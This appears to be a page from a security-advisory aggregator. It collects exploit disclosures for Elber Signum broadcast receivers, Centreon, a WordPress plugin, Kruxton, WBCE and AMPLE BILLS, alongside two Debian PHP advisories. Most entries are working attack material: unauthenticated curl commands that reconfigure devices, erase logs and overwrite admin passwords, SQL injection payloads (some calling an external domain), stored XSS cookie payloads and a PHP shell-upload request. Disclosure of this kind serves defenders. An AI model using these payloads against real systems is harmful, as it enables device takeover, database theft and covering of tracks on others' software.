Elber Signum DVB-S/S2 IRD for Radio Networks version 1.999 suffers from an unauthenticated device configuration and client-side hidden functionality disclosure vulnerability.

  
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Device Config

Vendor: Elber S.r.l.  
Product web page: https://www.elber.it  
Affected version: 1.999 Revision 1243  
                  1.317 Revision 602  
                  1.220 Revision 1250  
                  1.220 Revision 1248_1249  
                  1.220 Revision 597  
                  1.217 Revision 1242  
                  1.214 Revision 1023  
                  1.193 Revision 924  
                  1.175 Revision 873  
                  1.166 Revision 550

Summary: The SIGNUM controller from Elber satellite equipment demodulates  
one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving  
256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned  
and configured in 1+1 seamless switching for redundancy. Redundancy can also  
be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II  
audio codec, providing analog and digital outputs; moreover, it’s possible  
to set a data PID to be decoded and passed to the internal RDS encoder,  
generating the dual MPX FM output.

Desc: The device suffers from an unauthenticated device configuration and  
client-side hidden functionality disclosure.

Tested on: NBFM Controller  
           embOS/IP

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5815  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5815.php

18.08.2023

--

# Config fan  
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='  
Configuration applied

# Delete config  
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'  
File delete successfully

# Launch upgrade  
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'  
Upgrade launched Successfully

# Log erase  
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'  
Logs erased

# Until:  
# =0 ALL  
# =-2 Yesterday  
# =-8 Last week  
# =-15 Last two weeks  
# =-22 Last three weeks  
# =-31 Last month

# Set RX config  
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'  
RX Config Applied Successfully

# Show factory window and FPGA upload (Console)  
> cleber_show_factory_wnd()

# Etc.

Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Insecure Direct Object Reference

Elber Signum DVB-S/S2 IRD for Radio Networks version 1.999 suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security.

    Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication BypassVendor: Elber S.r.l.Product web page: https://www.elber.itAffected version: 1.999 Revision 1243                  1.317 Revision 602                  1.220 Revision 1250                  1.220 Revision 1248_1249                  1.220 Revision 597                  1.217 Revision 1242                  1.214 Revision 1023                  1.193 Revision 924                  1.175 Revision 873                  1.166 Revision 550Summary: The SIGNUM controller from Elber satellite equipment demodulatesone or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving256 KS/s as minimum symbol rate. The TS demodulated signals can be alignedand configured in 1+1 seamless switching for redundancy. Redundancy can alsobe achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/IIaudio codec, providing analog and digital outputs; moreover, it’s possibleto set a data PID to be decoded and passed to the internal RDS encoder,generating the dual MPX FM output.Desc: The device suffers from an authentication bypass vulnerability througha direct and unauthorized access to the password management functionality. Theissue allows attackers to bypass authentication by manipulating the set_pwdendpoint that enables them to overwrite the password of any user within thesystem. This grants unauthorized and administrative access to protected areasof the application compromising the device's system security.--------------------------------------------------------------------------/modules/pwd.html------------------50: function apply_pwd(level, pwd)51: {52:   $.get("json_data/set_pwd", {lev:level, pass:pwd},53:   function(data){54:     //$.alert({title:'Operation',text:data});55:     show_message(data);56:   }).fail(function(error){57:     show_message('Error ' + error.status, 'error');58:   });59: }--------------------------------------------------------------------------Tested on: NBFM Controller           embOS/IPVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5814Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5814.php18.08.2023--$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234Ref (lev param):Level 7 = SNMP Write Community (snmp_write_pwd)Level 6 = SNMP Read Community (snmp_read_pwd)Level 5 = Custom Password? hidden. (custom_pwd)Level 4 = Display Password (display_pwd)?Level 2 = Administrator Password (admin_pwd)Level 1 = Super User Password (puser_pwd)Level 0 = User Password (user_pwd)

Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass

Debian Linux Security Advisory 5661-1 - Multiple security issues were found in PHP, a widely-used open source general purpose scripting language which could result in secure cookie bypass, XXE attacks or incorrect validation of password hashes.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5661-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 15, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php8.2CVE ID         : CVE-2023-3823 CVE-2023-3824 CVE-2024-2756 CVE-2024-3096Multiple security issues were found in PHP, a widely-used open sourcegeneral purpose scripting language which could result in secure cookiebypass, XXE attacks or incorrect validation of password hashes.For the stable distribution (bookworm), these problems have been fixed inversion 8.2.18-1~deb12u1.We recommend that you upgrade your php8.2 packages.For the detailed security status of php8.2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php8.2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYdfYMACgkQEMKTtsN8TjbrZxAAotqJ1fIulmY7fP/Ll2Gb/aoswnUqZTNiZH/yrzwX86cggI61EaWXc/JW7O5i7+U4y63ZIl5M6HVFk5bNgnj6Rwl5bT+jz8dbqLKkphIkT0754h1bdXCaW73riiNztNclAITPYMOntY7TEWZuqS2p4cNjUuHYoPiqCLU8ASMoi/z2DHFWBc6uBLRRRqbhbdFbWeekzc6nt+JZmEVD9JLXsh8kO4/f5o1pbCx6pYerWM1Win5AW6ZBSNMd5xO5DTP3F/RX7BEyH7rTQ0y2TRCY4qk2LKG4cojqidgHIpCiTiFiKvk9W3EJZdKebrzHyBgEixzCImvYze68j0M0ruxWiTTozKEn9Tj7DSPNoD+vB6U8kGAqmG3b5q+pw9BSCQ+AZ25HvDqdasH8gaj8Ji4xAhWxVutQRrSbhcf3xKu8Y6taz3ANIRXBmgjEARhK9p4b66KauAxG5GavWQQQprcbzt0deGUK6WkxigQ04l38kIrD9XIXnMHBEH4/Aas8E6zv8+j+18RdPaSGDGTAvuJD/C9GQjWfIvRXYVjUKarlWgtrgDoxGIMlOIHhRwgyJdZzJAx2vAY2o1CYmtIS59zReqwK+rAtogFi2RIoruVPGLccgxcqJOtvJF7MXGBAVp+3Wi4SFK5QHu1ISlngw+LkNJdkz1yXcUVI6vLt0QQEt94==xxUv-----END PGP SIGNATURE-----

Debian Security Advisory 5661-1

Debian Linux Security Advisory 5660-1 - Multiple security issues were found in PHP, a widely-used open source general purpose scripting language which could result in secure cookie bypass, XXE attacks or incorrect validation of password hashes.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5660-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 15, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php7.4CVE ID         : CVE-2023-3823 CVE-2023-3824 CVE-2024-2756 CVE-2024-3096Multiple security issues were found in PHP, a widely-used open sourcegeneral purpose scripting language which could result in secure cookiebypass, XXE attacks or incorrect validation of password hashes.For the oldstable distribution (bullseye), these problems have been fixedin version 7.4.33-1+deb11u5.We recommend that you upgrade your php7.4 packages.For the detailed security status of php7.4 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php7.4Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYdfYIACgkQEMKTtsN8Tjavcw//TgnidCQ8c0hut2Ni6PP87fZH1uZZM+gAjUxS46UpNjsDtlu9WwXAxH09+uq0tg/dvKQLkC5W5gnUBiYhiOVoo9U75QP8oK2EYXyswXuEsb9tUhI/hEYr7KYaNHPRbSxZoowi6hKpXXpjoXc/+J9nghykSL9WeADJw4qP6QTclN274IfSujpmx6z+YqApbtW8wzACmHpdvXfCge09NHiN0Z/U8mpd99JBNIYGJGaSDmGNrnGMzBhOms+PTCqQQZPWgWh4RlggNSlslEadGN1huf1KpdHlPvSEfRavmzloX1Vt+XUrJM47nkD3y6y5TtckhGm7horXlskSovkNQZoa5G8NhAT1trzhfP07QJWJBrcc8MZzJQYiwlqZAf/zY8/UcusrJj3Y8BdkfbdWb69PA6sC2qTDuj48p7adgYBZ5YOwmrC4dcwdRd9laGqnZAhk1htX19Gzt1gYL2wDPMU+2x+F0rbemXGS6UwRmrkSlTiWVka+T5y+JpC8lLXFR2dwF2KAdUK4dWPd5QUrNb0Tk9dBcEZuyLRevindp7gCKLx/1y/RsrNxT8b1yW5yUp9jtePFa83+jNyojvURlC0SAgTcwEUhltob4vsTAccZZSza3cxOlqzC7ysNd0TKz20rTZFKreygYyIXfmHHaWoYbiK5IEy1ogOVho9SXUYJ7Mc==ZcwU-----END PGP SIGNATURE-----

Debian Security Advisory 5660-1

Centreon version 23.10-1.el8 suffers from a remote authenticated SQL injection vulnerability.

    ;; Postauth SQL Injection in Centreon 23.10-1.el8;; by code610;; ;; found : 05.03.2024;; version: centreon-vbox-vm-23_10-1.el8.zip;; details: https://code610.blogspot.com/2024/04/postauth-sqli-in-centreon-2310-1el8.html;; ;; sqlmap request.txtPOST /centreon/main.get.php?p=60201 HTTP/1.1Host: 192.168.56.156User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 2529Origin: http://192.168.56.156Connection: keep-aliveReferer: http://192.168.56.156/centreon/main.get.php?p=60201&o=aCookie: PHPSESSID=dvipe1o0so6gcg52gkgcrg2avhUpgrade-Insecure-Requests: 1service_description=2222222222xxxxxxxx22&service_hPars%5B%5D='%3e%22%3e%3csvg%2fonload%3dprompt(123)%3e&service_template_model_stm_id=83&command_command_id=134&macroInput%5B0%5D=MODE&macroValue%5B0%5D=connection-time&macroFrom%5B0%5D=fromTpl&macroTplValue_0=connection-time&macroOriginalName_0=&macroTplValToDisplay_0=1&macroDescription_0=&macroTpl_0=Service+template+%3A+App-DB-MySQL-Connection-Time&macroOldValue_0=connection-time&isFrozen_0=0&clone_order_macro_0=&macroInput%5B1%5D=WARNING&macroValue%5B1%5D=1000&macroFrom%5B1%5D=fromTpl&macroTplValue_1=1000&macroOriginalName_1=&macroTplValToDisplay_1=1&macroDescription_1=&macroTpl_1=Service+template+%3A+App-DB-MySQL-Connection-Time&macroOldValue_1=1000&isFrozen_1=0&clone_order_macro_1=&macroInput%5B2%5D=CRITICAL&macroValue%5B2%5D=5000&macroFrom%5B2%5D=fromTpl&macroTplValue_2=5000&macroOriginalName_2=&macroTplValToDisplay_2=1&macroDescription_2=&macroTpl_2=Service+template+%3A+App-DB-MySQL-Connection-Time&macroOldValue_2=5000&isFrozen_2=0&clone_order_macro_2=&timeperiod_tp_id=1&service_max_check_attempts=&service_normal_check_interval=&service_retry_check_interval=&service_active_checks_enabled%5Bservice_active_checks_enabled%5D=2&service_passive_checks_enabled%5Bservice_passive_checks_enabled%5D=2&service_is_volatile%5Bservice_is_volatile%5D=2&service_notifications_enabled%5Bservice_notifications_enabled%5D=2&service_use_only_contacts_from_host%5Bservice_use_only_contacts_from_host%5D=0&service_notification_interval=&timeperiod_tp_id2=&service_first_notification_delay=&service_recovery_notification_delay=&service_obsess_over_service%5Bservice_obsess_over_service%5D=2&service_acknowledgement_timeout=&service_check_freshness%5Bservice_check_freshness%5D=2&service_freshness_threshold=&service_flap_detection_enabled%5Bservice_flap_detection_enabled%5D=2&service_low_flap_threshold=&service_high_flap_threshold=&service_retain_status_information%5Bservice_retain_status_information%5D=2&service_retain_nonstatus_information%5Bservice_retain_nonstatus_information%5D=2&service_event_handler_enabled%5Bservice_event_handler_enabled%5D=2&command_command_id2=&command_command_id_arg2=&graph_id=&esi_notes_url=&esi_notes=&esi_action_url=&esi_icon_image=&esi_icon_image_alt=&criticality_id=&geo_coords=&service_activate%5Bservice_activate%5D=1&service_comment=&submitA=Save&macroFrom%5B%23index%23%5D=direct&service_id=&service_register=1&p=60201&o=a&initialValues=a%3A0%3A%7B%7D&select=&argChecker=1&macChecker=1&centreon_token=0e87a8f24318f5221765b62c09cb10bf;; --- ;; init response:        <a href="main.php?p=60201"             class="pathWay">Services by host</a>        </div>SQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not defined<br /><b>Fatal error</b>:  Uncaught PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '"><svg/onload=prompt(123)>' AND hsr.service_service_id = service_id AND servi...' at line 1 in /usr/share/centreon/www/class/centreonDB.class.php:311Stack trace:#0 /usr/share/centreon/www/class/centreonDB.class.php(311): PDO->query()#1 /usr/share/centreon/www/include/configuration/configObject/service/DB-Func.php(281): CentreonDB->query()#2 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm/Rule/Callback.php(57): testServiceExistence()#3 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm/RuleRegistry.php(130): HTML_QuickForm_Rule_Callback->validate()#4 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm.php(1315): HTML_QuickForm_RuleRegistry->validate()#5 /usr/share/centreon/www/include/configuration/configObject/service/formService.php(1156): HTML_QuickForm->validate()#6 /usr/share/centreon/www/include/configuration/configObject/service/serviceByHost.php(127): require_once('...')#7 /usr/share/centreon/www/main.get.php(304): include_once('...')#8 {main}  thrown in <b>/usr/share/centreon/www/class/centreonDB.class.php</b> on line <b>311</b><br />;; --- ;; More:;;   https://code610.blogspot.com;;   https://twitter.com/CodySixteen;; ;; cheers;;

Centreon 23.10-1.el8 SQL Injection

WordPress WP Video Playlist plugin version 1.1.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)# Date: 12 April 2024# Exploit Author: Erdemstar# Vendor: https://wordpress.com/# Version: 1.1.1# Proof Of Concept:1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named "videoFields[post_type]".# PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w# Vulnerable Property at Request: videoFields[post_type]# Payload: <script>alert(document.cookie)</script># Request:POST /wp-admin/options.php HTTP/2Host: erdemstar.localCookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9Content-Length: 395Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1Origin: https://erdemstar.localContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://erdemstar.local/wp-admin/admin.php?page=video_managerAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, ioption_page=mediaManagerCPT&action=update&_wpnonce=29af746404&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dvideo_manager%26settings-updated%3Dtrue&videoFields%5BmeidaId%5D=1&videoFields%5Bpost_type%5D=<script>alert(document.cookie)</script>&videoFields%5BmediaUri%5D=dummy&videoFields%5BoptionName%5D=videoFields&videoFields%5BoptionType%5D=add&submit=Save+Changes

WordPress WP Video Playlist 1.1.1 Cross Site Scripting

Kruxton version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: kruxton-1.0-Multiple-SQLi## Author: nu11secur1ty## Date: 04/15/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+'was submitted in the username parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.The attacker can get all information from the system byusing this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: username (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: username=DKVEBDYC@burpcollaborator.net'+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+''OR NOT 7810=7810 OR 'LaNe'='bRUy&password=v0N!p1j!S6    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: username=DKVEBDYC@burpcollaborator.net'+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+''AND (SELECT 1998 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT(ELT(1998=1998,1))),0x716b627071,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR'jdui'='fNTo&password=v0N!p1j!S6    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=DKVEBDYC@burpcollaborator.net'+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+''AND (SELECT 2923 FROM (SELECT(SLEEP(7)))UJBe) OR'ffIk'='SAqf&password=v0N!p1j!S6---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/kruxton-1.0/Multiple-SQLi)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/kruxton-10-multiple-sqli.html)## Time spent:01:15:00

Kruxton 1.0 SQL Injection

Kruxton version 1.0 suffers from a remote shell upload vulnerability.

## Title: kruxton-1.0-FileUpload-RCE  
## Author: nu11secur1ty  
## Date: 04/15/2024  
## Vendor: https://www.mayurik.com/  
## Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
## Reference: https://portswigger.net/web-security/file-upload

## Description:  
The system setting with parameter IMG is vulnerable to File Upload  
vulnerability.  
The attacker can upload a very malicious PHP file into the server and  
then he can execute it  
This is a potential CRITICAL PROBLEM!

STATUS: HIGH- Vulnerability

[+]Payload:  
```POST  
POST /kruxton/ajax.php?action=save_settings HTTP/1.1  
Host: localpwnedhost.com  
Cookie: bLicense67=1; sEmail=kurec%40guhai.mi.huq;  
PHPSESSID=lp21rf44drtnogjboa8v7lpmg1  
Content-Length: 1043  
Sec-Ch-Ua: "Chromium";v="123", "Not:A-Brand";v="8"  
Accept: */*  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryUwsdkjlNQ5exBwrq  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88  
Safari/537.36  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://localpwnedhost.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://localpwnedhost.com/kruxton/index.php?page=site_settings  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Priority: u=1, i  
Connection: close

------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="name"

Kruxton Bristo By Mayuri K  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="email"  
mayuri.infospace@gmail.com  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="contact"

9000000000  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="about"

<p>Kruxton Bristo By Mayuri K</p><p data-f-id="pbf" style="text-align:  
center; font-size: 14px; margin-top: 30px; opacity: 0.65; font-family:  
sans-serif;">Powered by <a  
href="https://www.froala.com/wysiwyg-editor?pb=1" title="Froala  
Editor">Froala Editor</a></p>  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="img"; filename="1nsi1deyou.php"  
Content-Type: application/octet-stream

<?php  
// by nu11secur1ty - 2024  
//Your malicious code here  
?>

------WebKitFormBoundaryUwsdkjlNQ5exBwrq--  
```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/kruxton-1.0)

## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/04/kruxton-10-fileupload-rce.html)

## Time spent:  
00:15:00

Kruxton 1.0 Shell Upload

WBCE version 1.6.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0  
# Date: 15.11.2023   
# Exploit Author: young pope   
# Vendor Homepage: https://github.com/WBCE/WBCE_CMS   
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.0.zip   
# Version: 1.6.0   
# Tested on: Kali linux   
# CVE : CVE-2023-39796

There is an sql injection vulnerability in *miniform* module which is a   
default module installed in the *WBCE* cms. It is an unauthenticated   
sqli so anyone could access it and takeover the whole database.

In file /modules/miniform/ajax_delete_message.php there is no   
authentication check. On line |40| in this file, there is a |DELETE|   
query that is vulnerable, an attacker could jump from the query using   
tick sign - ```.

Function |addslashes()|   
(https://www.php.net/manual/en/function.addslashes.php) escapes only   
these characters and not a tick sign:

  * single quote (')  
  * double quote (")  
  * backslash ()  
  * NUL (the NUL byte

The DB_RECORD_TABLE parameter is vulnerable.

If an unauthenticated attacker send this request:

```

POST /modules/miniform/ajax_delete_message.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML,   
like Gecko) Chrome/36.0.1985.125 Safari/537.36  
Connection: close  
Content-Length: 162  
Accept: */*  
Accept-Language: en  
Content-Type: application/x-www-form-urlencoded  
Accept-Encoding: gzip, deflate

action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record

```

The response is received after 6s.

Reference links:

  * https://nvd.nist.gov/vuln/detail/CVE-2023-39796  
  * https://forum.wbce.org/viewtopic.php?pid=42046#p42046  
  * https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1  
  * https://pastebin.com/PBw5AvGp

WBCE 1.6.0 SQL Injection

AMPLE BILLS version 0.1 suffers from a remote SQL injection vulnerability.

    ## Title: AMPLE BILLS 0.1 Multiple-SQLi## Author: nu11secur1ty## Date: 04/13/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The customer parameter (#1*) appears to be vulnerable to SQL injectionattacks. The payload (select*from(select(sleep(20)))a) was submittedin the customer parameter. The application took 20017 milliseconds torespond to the request, compared with 4 milliseconds for the originalrequest, indicating that the injected SQL command caused a time delay.The database appears to be MySQL. The attacker can get all informationfrom the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: #1* ((custom) POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)    Payload: customer=(-2876) OR5249=5249#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024    Type: UNION query    Title: MySQL UNION query (random number) - 1 column    Payload: customer=(-8147) UNION ALL SELECTCONCAT(0x7178627671,0x456d507450425279564f614b766957634d464a6c63536e6f63464953467254446171427a754e5769,0x7176626271),7839,7839,7839,7839#from(select(sleep(20)))a)&issuedate=03/15/2024- 04/13/2024---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/AMPLE-BILLS-0.1)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/ample-bills-01-multiple-sqli.html)## Time spent:01:15:00

Tag

#php